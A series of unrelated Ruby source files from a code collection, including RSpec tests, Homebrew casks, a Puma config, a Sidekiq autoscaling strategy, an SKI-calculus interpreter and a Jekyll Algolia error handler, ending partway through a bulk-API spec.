to_return(status: 200, body: body)
end
it { is_expected.to eq(Gem::Version.new("1.7.0")) }
end
context "when the latest version is older than another, non-prerelease" do
before do
body = fixture("javascript", "npm_response_old_latest.json")
stub_request(:get, "https://registry.npmjs.org/etag").
to_return(status: 200, body: body)
end
it { is_expected.to eq(Gem::Version.new("1.6.0")) }
end
end
describe "#updated_requirements" do
subject { checker.updated_requirements.first }
let(:dependency) do
Dependabot::Dependency.new(
name: "etag",
version: "1.0.0",
requirements: [
{ file: "yarn.lock", requirement: original_requirement, groups: [] }
],
package_manager: "yarn"
)
end
let(:original_requirement) { "^1.0.0" }
let(:latest_resolvable_version) { nil }
before do
allow(checker).
to receive(:latest_resolvable_version).
and_return(latest_resolvable_version)
end
context "when there is no resolvable version" do
let(:latest_resolvable_version) { nil }
its([:requirement]) { is_expected.to eq(original_requirement) }
end
context "when there is a resolvable version" do
let(:latest_resolvable_version) { Gem::Version.new("1.5.0") }
context "and a full version was previously specified" do
let(:original_requirement) { "1.2.3" }
its([:requirement]) { is_expected.to eq("1.5.0") }
end
context "and a partial version was previously specified" do
let(:original_requirement) { "0.1" }
its([:requirement]) { is_expected.to eq("1.5") }
end
context "and the new version has fewer digits than the old one§" do
let(:original_requirement) { "1.1.0.1" }
its([:requirement]) { is_expected.to eq("1.5.0") }
end
context "and a caret was previously specified" do
let(:original_requirement) { "^1.2.3" }
its([:requirement]) { is_expected.to eq("^1.5.0") }
end
context "and a pre-release was previously specified" do
let(:original_requirement) { "^1.2.3-rc1" }
its([:requirement]) { is_expected.to eq("^1.5.0") }
end
context "and an x.x was previously specified" do
let(:original_requirement) { "^0.x.x-rc1" }
its([:requirement]) { is_expected.to eq("^1.x.x") }
end
context "and an x.x was previously specified with four places" do
let(:original_requirement) { "^0.x.x.rc1" }
its([:requirement]) { is_expected.to eq("^1.x.x") }
end
end
end
end
| 29.649215 | 79 | 0.607275 |
e9a27790f146f5b7f735473b04811c0e3d836c90 | 579 | cask 'iglance' do
  version '2.0.3'
  sha256 '4f5c416d99c35884e28ad7b418c28b6f8c1cd75faa33895ae5f85d3ad04b0735'

  url "https://github.com/iglance/iglance/releases/download/v#{version}/iGlance_v#{version}.zip"
  appcast 'https://github.com/iglance/iglance/releases.atom'
  name 'iGlance'
  homepage 'https://github.com/iglance/iGlance'

  # The app ships its own updater (Sparkle-style appcast above).
  auto_updates true
  depends_on macos: '>= :sierra'

  app 'iGlance.app'

  # Residue removed by `brew cask zap`.
  zap trash: [
    '~/Library/Caches/io.github.iglance.iGlance',
    '~/Library/Preferences/io.github.iglance.iGlance.plist',
  ]
end
| 28.95 | 96 | 0.694301 |
edd387e7210e3dd9f6ea117d47e6131e66c08afa | 111 | class Comment < ActiveRecord::Base
  # A comment is authored by a user and attached to a single post.
  belongs_to :post
  belongs_to :user

  # Comments must not be blank.
  validates :body, presence: true
end
| 18.5 | 34 | 0.756757 |
d5f9a04bb00c48e5080ad3634fa6674f4edeb24f | 1,603 | # frozen_string_literal: true
#
# Puma serves each request on a thread from an internal pool. `threads`
# takes a minimum and a maximum; keep the maximum in line with any library
# thread pools (Active Record's connection pool also defaults to 5, which
# is why 5/5 is the default here).
#
max_threads_count = ENV.fetch('RAILS_MAX_THREADS') { 5 }
min_threads_count = ENV.fetch('RAILS_MIN_THREADS') { max_threads_count }
threads min_threads_count, max_threads_count

# Port Puma listens on for incoming requests; defaults to 3000.
#
port ENV.fetch('PORT') { 3000 }

# Environment Puma runs in.
#
environment ENV.fetch('RAILS_ENV') { 'development' }

# Location of Puma's pidfile.
pidfile ENV.fetch('PIDFILE') { 'tmp/pids/server.pid' }

# Workers (clustered mode) are forked web server processes; the app's total
# concurrency is `threads` maximum * `workers`. Workers are unavailable on
# JRuby and Windows, neither of which supports fork.
#
# workers ENV.fetch("WEB_CONCURRENCY") { 2 }

# When using `workers`, enable `preload_app!` so the application is booted
# once before forking, letting workers share memory via copy-on-write.
#
# preload_app!

# Allow puma to be restarted by `rails restart` command.
plugin :tmp_restart
| 38.166667 | 85 | 0.766064 |
284e7441f109118c8fa3c98800e3750ad637dc9c | 496 | class JokeGenerator::Category
attr_accessor :title, :link
attr_reader :jokes

# Registry of every category instantiated so far.
@@all = []

# Builds a Category from a scraped link node (anything responding to
# #attribute, e.g. a Nokogiri element) on the categories index page.
def self.new_from_categories_page(element)
  new(element.attribute("title").value, element.attribute("href").value)
end

def initialize(title = nil, link = nil)
  @title = title
  @link = link
  @jokes = []
  @@all << self
end

# Records a joke under this category.
def add_joke(joke)
  jokes << joke
end

# Categories are addressed with 1-based ids (as shown to the user).
def self.find(id)
  all[id - 1]
end

def self.all
  @@all
end
end
| 14.171429 | 46 | 0.608871 |
6a25acc3b671f7201a622cc95b4e0cfef50948d8 | 746 | cask 'font-firacode-nerd-font-mono' do
  version '1.1.0'
  sha256 '551309fad856238876d051bfb2d81d9c85707f797de562529cb5aa2505e2ac7d'

  url "https://github.com/ryanoasis/nerd-fonts/releases/download/v#{version}/FiraCode.zip"
  appcast 'https://github.com/ryanoasis/nerd-fonts/releases.atom',
          checkpoint: '109f18cfd453156e38ffac165683bcfc2745e0c8dc07bd379a7f9ea19d0cbe41'
  name 'FuraCode Nerd Font (FiraCode)'
  homepage 'https://github.com/ryanoasis/nerd-fonts'

  # NOTE(review): the "Fura Code" (vs "Fira Code") spelling below appears
  # intentional — it matches the patched font filenames shipped in the
  # upstream release archive; confirm against the release assets before
  # "fixing" it.
  font 'Fura Code Bold Nerd Font Complete Mono.otf'
  font 'Fura Code Medium Nerd Font Complete Mono.otf'
  font 'Fura Code Retina Nerd Font Complete Mono.otf'
  font 'Fura Code Regular Nerd Font Complete Mono.otf'
  font 'Fura Code Light Nerd Font Complete Mono.otf'
end
| 43.882353 | 90 | 0.776139 |
ab425b0adf3c3375e8c36bcf7aa65bf9926a2002 | 2,744 | # frozen_string_literal: true
module SidekiqAutoscale
module Strategies
class DelayScaling < BaseScaling
  # Scaling strategy based on how long jobs sit in the queue before being
  # picked up: scale up when the average enqueue->pickup delay over the last
  # SAMPLE_RANGE exceeds the configured ceiling, down when it drops below
  # the floor.
  SAMPLE_RANGE = 1.minute
  DELAY_LOG_KEY = "sidekiq_autoscaling:delay_log"
  DELAY_AVERAGE_CACHE_KEY = "sidekiq_autoscaling:delay_average"
  LOG_TAG = "[SIDEKIQ_SCALE][DELAY_SCALING]"

  # Records this job's queueing delay in a Redis sorted set, scored by the
  # current timestamp so old samples can be trimmed by score later.
  def log_job(job)
    timestamp = Time.current.to_f
    # Include the jid so that each zset entry is guaranteed to be unique
    # (two jobs with the same delay must not collapse into one member).
    zset_payload = {delay: (timestamp - job["enqueued_at"]), jid: job["jid"]}.to_json

    # Redis zadd runs in O(log(N)) time, so this is done on a background
    # thread to avoid blocking job processing.
    # NOTE(review): the thread is fire-and-forget and the connection is not
    # pooled — samples may be silently lost if the write fails; confirm
    # that's acceptable.
    Thread.new {
      SidekiqAutoscale.redis_client.zadd(DELAY_LOG_KEY, timestamp, zset_payload)
    }
  end

  def workload_change_needed?(_job)
    workload_too_high? || workload_too_low?
  end

  # +1 to scale up, -1 to scale down, 0 to stay put.
  def scaling_direction(_job)
    return -1 if workload_too_low?
    return 1 if workload_too_high?

    0
  end

  private

  # Average queueing delay (seconds) over the last SAMPLE_RANGE.
  # Cached for SAMPLE_RANGE because the zset scan is not cheap.
  def delay_average
    SidekiqAutoscale.cache.fetch(DELAY_AVERAGE_CACHE_KEY, expires_in: SAMPLE_RANGE) do
      # Delete old scores that won't be included in the metric
      SidekiqAutoscale.redis_client.zremrangebyscore(DELAY_LOG_KEY, 0, SAMPLE_RANGE.ago.to_f)
      vals = SidekiqAutoscale.redis_client.zrange(DELAY_LOG_KEY, 0, -1).map {|i| JSON.parse(i)["delay"].to_f }
      return 0 if vals.empty?

      # Plain arithmetic mean (was an instance_eval'd reduce; Array#sum is
      # clearer and numerically at least as good for floats).
      vals.sum / vals.size.to_f
    rescue JSON::ParserError => e
      SidekiqAutoscale.logger.error(e)
      SidekiqAutoscale.logger.error(e.backtrace.join("\n"))
      return 0
    end
  end

  def workload_too_high?
    too_high = delay_average > SidekiqAutoscale.scale_up_threshold
    SidekiqAutoscale.logger.debug("#{LOG_TAG} Workload too high") if too_high
    SidekiqAutoscale.logger.debug("#{LOG_TAG} Current average delay: #{delay_average}, max allowed: #{SidekiqAutoscale.scale_up_threshold}")
    too_high
  end

  def workload_too_low?
    too_low = delay_average < SidekiqAutoscale.scale_down_threshold
    SidekiqAutoscale.logger.debug("#{LOG_TAG} Workload too low") if too_low
    SidekiqAutoscale.logger.debug("#{LOG_TAG} Current average delay: #{delay_average}, min allowed: #{SidekiqAutoscale.scale_down_threshold}")
    too_low
  end

  # NOTE(review): intentionally-empty method kept for interface
  # compatibility; appears to be a leftover stub.
  def delay_array; end
end
end
end
| 37.589041 | 146 | 0.679665 |
6ab79ea6601f28cfba1e260008417ab685fb2e75 | 1,092 | class Dbhash < Formula
  desc "Computes the SHA1 hash of schema and content of a SQLite database"
  homepage "https://www.sqlite.org/dbhash.html"
  url "https://sqlite.org/2019/sqlite-src-3300100.zip"
  version "3.30.1"
  sha256 "4690370737189149c9e8344414aa371f89a70e3744ba317cef1a49fb0ee81ce1"

  bottle do
    cellar :any_skip_relocation
    sha256 "9ea365cbc64a6623313e4d6701ac5cfe12d14b76be8b6fba72afdb47129327d6" => :catalina
    sha256 "84322ef8c2737104776358d3ddc6f253ce4e4d9bf464d4d2da1fa8c56bba7d2f" => :mojave
    sha256 "953a02effe120859def6682480aa659fd137163ff1334d247c2ebd20472407c4" => :high_sierra
  end

  # dbhash is one of several utilities in the SQLite source tree;
  # build and install only that target.
  def install
    system "./configure", "--disable-debug", "--prefix=#{prefix}"
    system "make", "dbhash"
    bin.install "dbhash"
  end

  # Hash a freshly-created single-table database and compare against the
  # known digest for that schema.
  test do
    dbpath = testpath/"test.sqlite"
    sqlpath = testpath/"test.sql"
    sqlpath.write "create table test (name text);"
    system "/usr/bin/sqlite3 #{dbpath} < #{sqlpath}"
    assert_equal "b6113e0ce62c5f5ca5c9f229393345ce812b7309",
                 shell_output("#{bin}/dbhash #{dbpath}").strip.split.first
  end
end
| 36.4 | 93 | 0.738095 |
bf4382a6d8a0e9279ef7fba8fa082561dad51d8f | 663 | #
# Cookbook Name:: apache2
# Recipe:: mod_expires
#
# Copyright 2008-2013, Opscode, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Enable Apache's mod_expires (Expires / Cache-Control header generation).
apache_module 'expires'
| 31.571429 | 74 | 0.75264 |
1178e9348e96f110bcf6828eec639beee8c02a90 | 72 |
begin
  quotient = 1 / 0
rescue
  # 1 / 0 raises ZeroDivisionError before the assignment completes, so
  # `quotient` below remains nil.
  # Fixed an IME mis-conversion in the message: 「助産師用とした」(garbled)
  # was intended to be 「除算しようとした」("attempted to divide").
  puts 'ぜろで除算しようとした'
end

p quotient # => nil
| 9 | 21 | 0.652778 |
# A variable/symbol leaf in an SKI-calculus expression tree.
# (Fixed: the class header line had dataset metadata fused onto it,
# which made it invalid Ruby.)
class SKISymbol < Struct.new(:name)
  def to_s
    name.to_s
  end

  def inspect
    to_s
  end

  # A bare symbol acts as its own "combinator" and carries no arguments.
  def combinator
    self
  end

  def arguments
    []
  end

  # Symbols are never callable and contain nothing to reduce.
  def callable?(*arguments)
    false
  end

  def reduciable?
    false
  end

  # Eliminates the variable `name` from this expression: the variable
  # itself becomes I (identity); any other symbol becomes the constant
  # function K[self].
  def as_a_function_of(name)
    if self.name == name
      I
    else
      SKICall.new(K, self)
    end
  end
end
# An application node in an SKI expression tree: `left` applied to `right`.
class SKICall < Struct.new(:left, :right)
  # Fixed: was mistakenly defined as `to_S`, so #inspect fell back to
  # Struct's default representation instead of "left[right]".
  def to_s
    "#{left}[#{right}]"
  end

  def inspect
    to_s
  end

  # The combinator at the head of this (possibly nested) application.
  def combinator
    left.combinator
  end

  # All arguments applied to the head combinator, left-to-right.
  def arguments
    left.arguments + [right]
  end

  def reduciable?
    left.reduciable? || right.reduciable? || combinator.callable?(*arguments)
  end

  # Performs one reduction step: reduce the left subtree first, then the
  # right, and only then apply the head combinator.
  def reduce
    if left.reduciable?
      SKICall.new(left.reduce, right)
    elsif right.reduciable?
      # Fixed: was `SKICall.new(left. right.reduce)` — a "." typo for ","
      # that passed a single (wrong) argument.
      SKICall.new(left, right.reduce)
    else
      combinator.call(*arguments)
    end
  end

  # Eliminates `name` using the S rule: (f g)[x] => S[f'][g'] where f', g'
  # are the abstractions of the two subtrees.
  def as_a_function_of(name)
    left_function = left.as_a_function_of(name)
    right_function = right.as_a_function_of(name)

    # Fixed: was `right.function` (a method call on `right`) instead of
    # the local variable computed above.
    SKICall.new(SKICall.new(S, left_function), right_function)
  end
end
class SKICombinator < SKISymbol
  # A combinator is callable exactly when it has accumulated as many
  # arguments as its #call implementation declares.
  def callable?(*arguments)
    method(:call).arity == arguments.length
  end

  # A combinator never matches a variable name, so abstracting any
  # variable out of it always yields the constant form K[combinator].
  def as_a_function_of(name)
    SKICall.new(K, self)
  end
end
S, K, I = [:S, :K, :I].map { |name| SKICombinator.new(name) }

# S combinator: S[a][b][c] reduces to a[c][b[c]].
# Fixed: the body previously built an unrelated expression and referenced
# an undefined variable `x`.
def S.call(a, b, c)
  SKICall.new(SKICall.new(a, c), SKICall.new(b, c))
end

# K combinator: K[a][b] reduces to a (second argument discarded).
# Fixed: the parameter list was `(a.b)` — a "." typo for "," — which is
# invalid Ruby.
def K.call(a, b)
  a
end

# I combinator: I[a] reduces to a (identity).
def I.call(a)
  a
end
#def S.callable?(*arguments)
# arguments.length == 3
#end
#
#def K.callable?(*arguments)
# arguments.length == 2
#end
#
#def I.callable?(*arguments)
# arguments.length == 1
#end
# A lambda-calculus variable; compiles to the SKI symbol of the same name.
class LCVariable < Struct.new(:name)
  def to_ski
    SKISymbol.new(name)
  end
end
# A lambda-calculus application; compiles to an SKI application of the
# compiled subexpressions.
class LCCall < Struct.new(:left, :right)
  def to_ski
    SKICall.new(left.to_ski, right.to_ski)
  end
end
# A lambda-calculus abstraction (function).
# Fixed: was declared with `def LCFunction < Struct.new(...)`, which is
# invalid Ruby — it must be a class definition.
class LCFunction < Struct.new(:parameter, :body)
  # Compile by converting the body to SKI and abstracting the bound
  # parameter out of the result.
  def to_ski
    body.to_ski.as_a_function_of(parameter)
  end
end
| 14.707483 | 81 | 0.584644 |
f806f97d5b89ae7c929450d8664496f77baa8dc5 | 8,553 | # frozen_string_literal: true
require 'verbal_expressions'
require 'filesize'
require 'cgi'
module Jekyll
module Algolia
# Catch API errors and display messages
module ErrorHandler
include Jekyll::Algolia
# Public: Halt the plugin, displaying a human-readable message when the
# error can be identified
#
# error - The caught error
# context - A hash of values passed from where the error happened,
# used to enrich the displayed message
#
# Always exits the process with status 1.
def self.stop(error, context = {})
  Logger.verbose("E:[jekyll-algolia] Raw error: #{error}")
  Logger.verbose("E:[jekyll-algolia] Context: #{context}")

  known = identify(error, context)
  if known
    Logger.known_message(known[:name], known[:details])
  else
    # Unrecognized error: dump it raw
    Logger.log('E:[jekyll-algolia] Error:')
    Logger.log("E:#{error}")
  end

  exit 1
end
# Public: Identify the error and return its internal name
#
# error - The caught error
# context - A hash of additional information passed from the code that
# intercepted the error
#
# Tries every known-issue matcher in order until one matches. Returns
# false when nothing matches, or a hash of :name and :details further
# identifying the issue.
def self.identify(error, context = {})
  known_errors = %w[
    unknown_application_id
    invalid_credentials_for_tmp_index
    invalid_credentials
    record_too_big
    unknown_settings
    invalid_index_name
  ]

  # Each entry above has a predicate method (eg. record_too_big?) that
  # returns false, or a hash of details about the match
  known_errors.each do |error_name|
    details = send("#{error_name}?", error, context)
    return { name: error_name, details: details } unless details == false
  end

  false
end
# Public: Parses an Algolia error message into a hash of its content
#
# message - The raw message as returned by the API
#
# Returns a hash of all parts of the message, to be more easily consumed
# by our error matchers, or false when the message does not match the
# expected shape
def self.error_hash(message)
  message = message.delete("\n")

  # Ex: Cannot PUT to https://appid.algolia.net/1/indexes/index_name/settings:
  # {"message":"Invalid Application-ID or API key","status":403} (403)
  regex = VerEx.new do
    find 'Cannot '
    capture('verb') { word }
    find ' to '
    capture('scheme') { word }
    find '://'
    capture('application_id') { word }
    anything_but '/'
    find '/'
    capture('api_version') { digit }
    find '/'
    capture('api_section') { word }
    find '/'
    capture('index_name') do
      anything_but('/')
    end
    find '/'
    capture do
      capture('api_action') { word }
      maybe '?'
      capture('query_parameters') do
        anything_but(':')
      end
    end
    find ': '
    capture('json') do
      find '{'
      anything_but('}')
      find '}'
    end
    find ' ('
    capture('http_error') { word }
    find ')'
  end

  matches = regex.match(message)
  return false unless matches

  # Convert matches to a hash
  hash = {}
  matches.names.each do |name|
    hash[name] = matches[name]
  end

  hash['api_version'] = hash['api_version'].to_i
  hash['http_error'] = hash['http_error'].to_i

  # Merging the JSON key directly in the answer
  hash = hash.merge(JSON.parse(hash['json']))
  hash.delete('json')

  # Merging the query parameters in the answer
  # (CGI.parse maps each key to an array of values; keep the first one)
  CGI.parse(hash['query_parameters']).each do |key, values|
    hash[key] = values[0]
  end
  hash.delete('query_parameters')

  hash
end
# Public: Check if the application id is available
#
# _context - Not used
#
# If the call to the cluster fails, chances are that the application ID
# is invalid. As we cannot actually contact the server, the error is raw
# and does not follow our error spec, so it is parsed by hand here.
def self.unknown_application_id?(error, _context = {})
  message = error.message

  return false if message !~ /^Cannot reach any host/

  matches = /.*\((.*)\.algolia.net.*/.match(message)

  # The API will browse on APP_ID-dsn, but push/delete on APP_ID only
  # We need to catch both potential errors
  app_id = matches[1].gsub(/-dsn$/, '')

  { 'application_id' => app_id }
end
# Public: Check if credentials specifically can't access the _tmp index
#
# _context - Not used
#
# If the error happens on a _tmp index, it likely means that the API key
# does not have access to the _tmp indices, and the error message will
# reflect that.
def self.invalid_credentials_for_tmp_index?(error, _context = {})
  details = error_hash(error.message)

  index_name_tmp = details['index_name']
  if details['message'] != 'Index not allowed with this API key' ||
     index_name_tmp !~ /_tmp$/
    return false
  end

  {
    'application_id' => Configurator.application_id,
    'index_name' => Configurator.index_name,
    'index_name_tmp' => index_name_tmp
  }
end
# Public: Check if the credentials are working
#
# _context - Not used
#
# The submitted application ID and API key don't match any known
# credentials
def self.invalid_credentials?(error, _context = {})
  details = error_hash(error.message)

  if details['message'] != 'Invalid Application-ID or API key'
    return false
  end

  {
    'application_id' => details['application_id']
  }
end
# Public: Check if the sent records are not too big
#
# context[:records] - list of records to push
#
# Records cannot weigh more than 10Kb. If we're getting this error it
# means that one of the records is too big, so we'll try to give
# information about it so the user can debug it.
def self.record_too_big?(error, context = {})
  details = error_hash(error.message)

  message = details['message']
  return false if message !~ /^Record .* is too big .*/

  # Getting the record size
  size, = /.*size=(.*) bytes.*/.match(message).captures
  size = Filesize.from("#{size} B").pretty
  object_id = details['objectID']

  # Getting record details
  record = Utils.find_by_key(context[:records], :objectID, object_id)

  {
    'object_id' => object_id,
    'object_title' => record[:title],
    'object_url' => record[:url],
    'object_hint' => record[:content][0..100],
    'nodes_to_index' => Configurator.algolia('nodes_to_index'),
    'size' => size,
    'size_limit' => '10 Kb'
  }
end
# Public: Check if one of the index settings is invalid
#
# context[:settings] - The settings passed to update the index
#
# The API will block any call that tries to update a setting value that is
# not available. We'll tell the user which one so they can fix their
# issue.
def self.unknown_settings?(error, context = {})
  details = error_hash(error.message)

  message = details['message']
  return false if message !~ /^Invalid object attributes.*/

  # Getting the unknown setting name
  regex = /^Invalid object attributes: (.*) near line.*/
  setting_name, = regex.match(message).captures
  setting_value = context[:settings][setting_name]

  {
    'setting_name' => setting_name,
    'setting_value' => setting_value
  }
end
# Public: Check if the index name is invalid
#
# Some characters are forbidden in index names
def self.invalid_index_name?(error, _context = {})
  details = error_hash(error.message)

  message = details['message']
  return false if message !~ /^indexName is not valid.*/

  {
    'index_name' => Configurator.index_name
  }
end
end
end
end
| 31.560886 | 84 | 0.580264 |
5d2842b3b343c3f19090c0f498824a81d569ab24 | 27 | RSpec.describe Apps do
end
| 9 | 22 | 0.814815 |
4a8f25907067430c19c4ed2352c90aed7a87dfb6 | 4,479 | require 'test_helper'
describe Shaf::Formable do
  # A fresh anonymous class per example so form definitions don't leak
  # between tests.
  let(:clazz) { Class.new }
  let(:subject) do
    Class.new do
      extend Shaf::Formable
    end
  end

  it 'adds form_for class method' do
    assert subject.respond_to? :form_for
  end

  it 'creates a create form' do
    subject.forms_for(clazz) do
      title 'Create Form'
      action :create
    end
    assert_instance_of(Shaf::Formable::Form, clazz.create_form)
    assert_equal 'Create Form', clazz.create_form.title
    assert_equal :'create-form', clazz.create_form.name
    assert_equal :create, clazz.create_form.action
  end

  it 'creates a create form from a nested block' do
    subject.form_for(clazz) do
      create_form do
        title 'Create Form'
      end
    end
    assert_instance_of(Shaf::Formable::Form, clazz.create_form)
    assert_equal 'Create Form', clazz.create_form.title
    assert_equal :'create-form', clazz.create_form.name
    assert_equal :create, clazz.create_form.action
  end

  # Older (legacy) syntax: a bare `create` block instead of `create_form`.
  it 'adds _form when not provided (legacy)' do
    subject.form_for(clazz) do
      create do
        title 'Create Form'
      end
    end
    assert_instance_of(Shaf::Formable::Form, clazz.create_form)
    assert_equal 'Create Form', clazz.create_form.title
    assert_equal :'create-form', clazz.create_form.name
    assert_equal :create, clazz.create_form.action
  end

  it 'can override action' do
    subject.form_for(clazz) do
      create_form do
        title 'Some form'
        action 'archive'
      end
    end
    assert_instance_of(Shaf::Formable::Form, clazz.create_form)
    assert_equal 'Some form', clazz.create_form.title
    assert_equal :'archive-form', clazz.create_form.name
    assert_equal :archive, clazz.create_form.action
  end

  it 'does not create a create form without action' do
    subject.form_for(clazz) do
      title 'Create Form'
    end
    assert_empty clazz.singleton_methods.grep(/_form/)
  end

  it 'is possible to set name' do
    subject.form_for(clazz) do
      title 'Create Form'
      action :create
      name :"foo-form"
    end
    assert_instance_of(Shaf::Formable::Form, clazz.create_form)
    assert_equal :'foo-form', clazz.create_form.name
  end

  it 'is possible to set submit' do
    subject.form_for(clazz) do
      title 'Create Form'
      action :create
      submit :spara
    end
    assert_instance_of(Shaf::Formable::Form, clazz.create_form)
    assert_equal :spara, clazz.create_form.submit
  end

  it 'creates an edit form' do
    subject.form_for(clazz) do
      edit_form do
        title 'Edit Form'
        action :edit
      end
    end
    assert_instance_of(Shaf::Formable::Form, clazz.edit_form)
    assert_equal 'Edit Form', clazz.edit_form.title
    assert_equal :'edit-form', clazz.edit_form.name
    assert_equal :edit, clazz.edit_form.action
  end

  it 'creates different create and edit forms' do
    subject.forms_for(clazz) do
      title 'Common label'
      create_form do
        method :post
        type :foo
      end
      edit_form do
        method :patch
        type :bar
      end
    end
    create_form = clazz.create_form
    edit_form = clazz.edit_form
    assert_equal 'Common label', create_form.title
    assert_equal 'Common label', edit_form.title
    assert_equal 'POST', create_form.method
    assert_equal 'PATCH', edit_form.method
    assert_equal :foo, create_form.type
    assert_equal :bar, edit_form.type
  end

  it 'is possible to get the edit form from instances' do
    subject.form_for(clazz) do
      edit_form do
        title 'Edit Form'
        instance_accessor
      end
    end
    object = clazz.new
    assert_instance_of(Shaf::Formable::Form, object.edit_form)
    assert_equal 'Edit Form', object.edit_form.title
    assert_equal object, object.edit_form.resource
  end

  it 'prefills form from an instance' do
    clazz.define_method(:foo) { 5 }
    subject.form_for(clazz) do
      some_form do
        instance_accessor prefill: true
        field :bar, accessor_name: :foo
      end
    end
    object = clazz.new
    assert_equal 5, object.some_form[:bar].value
    # Form from class is still empty
    assert_nil clazz.some_form[:bar].value
  end

  it 'returns an empty form from an instance' do
    clazz.define_method(:foo) { 5 }
    subject.form_for(clazz) do
      some_form do
        instance_accessor prefill: false
        field :foo
      end
    end
    object = clazz.new
    assert_nil object.some_form[:foo].value
  end
end
| 24.745856 | 63 | 0.679839 |
0301e6fcc72c1fda88e49a60b370b88c8d10aef3 | 714 | require File.expand_path(File.dirname(__FILE__) + '/../../spec_helper')
describe "/acceptance_criteria/edit" do
  # Provide the minimum assigns the template reads, then render it once
  # so the shared examples can assert against the output.
  before :each do
    assigns[:project] = mock_model(Project,
                                   :stories => [],
                                   :iterations => [],
                                   :criterion => '')
    assigns[:story] = mock_model(Story,
                                 :acceptance_criteria => [],
                                 :content => '')
    assigns[:acceptance_criterion] = mock_model(AcceptanceCriterion,
                                                :criterion => '')
    render 'acceptance_criteria/edit'
  end

  it_should_behave_like "a standard view"
end
| 31.043478 | 71 | 0.477591 |
1a97a43ddc3bc1c86427526b31ab6a4e02d3d0ea | 101 | module Alexa
class ApplicationRecord < ActiveRecord::Base
self.abstract_class = true
end
end
| 16.833333 | 46 | 0.762376 |
# Sorts `array` in place and returns it.
# (Fixed: the `def` line had dataset metadata fused onto it, which made
# it invalid Ruby.)
#
# NOTE(review): despite the name, this is an exchange/selection-style sort —
# it compares each element against every later element rather than only
# adjacent pairs. The result (an ascending sort) is the same.
#
# array - an Array of mutually comparable elements
#
# Returns the same, now sorted, Array.
def bubble_sort(array)
  i = 0
  while i < array.size - 1
    j = i + 1
    while j < array.size
      array[i], array[j] = array[j], array[i] if array[i] > array[j]
      j = j + 1
    end
    i = i + 1
  end
  array
end
| 17.076923 | 68 | 0.509009 |
e2cf242f901a4a5b74731aa5838a0261b7f00aa2 | 658 | # encoding: utf-8
# This file is distributed under New Relic's license terms.
# See https://github.com/newrelic/newrelic-ruby-agent/blob/main/LICENSE for complete details.
# frozen_string_literal: true
module NewRelic
module Agent
# This class is used for instrumentations that have exceptions or error classes
# not derived from Ruby's usual Exception or StandardError or in situations
# where we do not have such Exception object to work with.
class NoticibleError
attr_reader :class_name, :message
def initialize class_name, message
@class_name = class_name
@message = message
end
end
end
end
| 28.608696 | 93 | 0.729483 |
8775a92f90d529097155f2ecd204ba50852e521c | 6,724 | require "spec_helper"
require "membrane"
require "json_message"
require "cf_message_bus/mock_message_bus"
module VCAP::CloudController
  describe LegacyBulk do
    let(:mbus) { CfMessageBus::MockMessageBus.new({}) }

    # Basic-auth credentials used throughout the examples below.
    before do
      @bulk_user = "bulk_user"
      @bulk_password = "bulk_password"
    end
describe ".register_subscription" do
it "should be able to discover credentials through message bus" do
LegacyBulk.configure(TestConfig.config, mbus)
expect(mbus).to receive(:subscribe)
.with("cloudcontroller.bulk.credentials.ng")
.and_yield("xxx", "inbox")
expect(mbus).to receive(:publish).with("inbox", anything) do |_, msg|
expect(msg).to eq({
"user" => @bulk_user,
"password" => @bulk_password,
})
end
LegacyBulk.register_subscription
end
end
    describe "GET", "/bulk/apps" do
      # Seed five apps so pagination examples have data to page through.
      before { 5.times { AppFactory.make } }

      it "requires authentication" do
        get "/bulk/apps"
        expect(last_response.status).to eq(401)

        # Wrong credentials are rejected just like missing ones.
        authorize "bar", "foo"
        get "/bulk/apps"
        expect(last_response.status).to eq(401)
      end
      describe "with authentication" do
        before do
          authorize @bulk_user, @bulk_password
        end

        it "requires a token in query string" do
          get "/bulk/apps"
          expect(last_response.status).to eq(400)
        end

        it "returns nil bulk_token for the initial request" do
          get "/bulk/apps"
          expect(decoded_response["bulk_token"]).to be_nil
        end

        it "returns a populated bulk_token for the initial request (which has an empty bulk token)" do
          get "/bulk/apps", {
            "batch_size" => 20,
            "bulk_token" => "{}",
          }
          expect(decoded_response["bulk_token"]).not_to be_nil
        end

        it "returns results in the response body" do
          get "/bulk/apps", {
            "batch_size" => 20,
            "bulk_token" => "{\"id\":20}",
          }
          expect(last_response.status).to eq(200)
          expect(decoded_response["results"]).not_to be_nil
        end

        it "returns results that are valid json" do
          get "/bulk/apps", {
            "batch_size" => 100,
            "bulk_token" => "{\"id\":0}",
          }
          expect(last_response.status).to eq(200)
          # Results are keyed by guid; every value must carry id + version.
          decoded_response["results"].each { |key,value|
            expect(value).to be_kind_of Hash
            expect(value["id"]).not_to be_nil
            expect(value["version"]).not_to be_nil
          }
        end

        it "respects the batch_size parameter" do
          [3,5].each { |size|
            get "/bulk/apps", {
              "batch_size" => size,
              "bulk_token" => "{\"id\":0}",
            }
            expect(decoded_response["results"].size).to eq(size)
          }
        end
it "returns non-intersecting results when token is supplied" do
get "/bulk/apps", {
"batch_size" => 2,
"bulk_token" => "{\"id\":0}",
}
saved_results = decoded_response["results"].dup
expect(saved_results.size).to eq(2)
get "/bulk/apps", {
"batch_size" => 2,
"bulk_token" => MultiJson.dump(decoded_response["bulk_token"]),
}
new_results = decoded_response["results"].dup
expect(new_results.size).to eq(2)
saved_results.each do |saved_result|
expect(new_results).not_to include(saved_result)
end
end
it "should eventually return entire collection, batch after batch" do
apps = {}
total_size = App.count
token = "{}"
while apps.size < total_size do
get "/bulk/apps", {
"batch_size" => 2,
"bulk_token" => MultiJson.dump(token),
}
expect(last_response.status).to eq(200)
token = decoded_response["bulk_token"]
apps.merge!(decoded_response["results"])
end
expect(apps.size).to eq(total_size)
get "/bulk/apps", {
"batch_size" => 2,
"bulk_token" => MultiJson.dump(token),
}
expect(decoded_response["results"].size).to eq(0)
end
        # When diego running support is disabled, diego-opted-in apps must
        # still be served by this (DEA) bulk endpoint.
        context "when diego_running is set to disabled" do
          before do
            allow(Config.config).to receive(:[]).with(anything).and_call_original
            allow(Config.config).to receive(:[]).with(:diego).and_return(
              staging: 'optional',
              running: 'disabled',
            )
            LegacyBulk.configure(Config.config, mbus)
          end

          it "includes diego apps" do
            environment = {
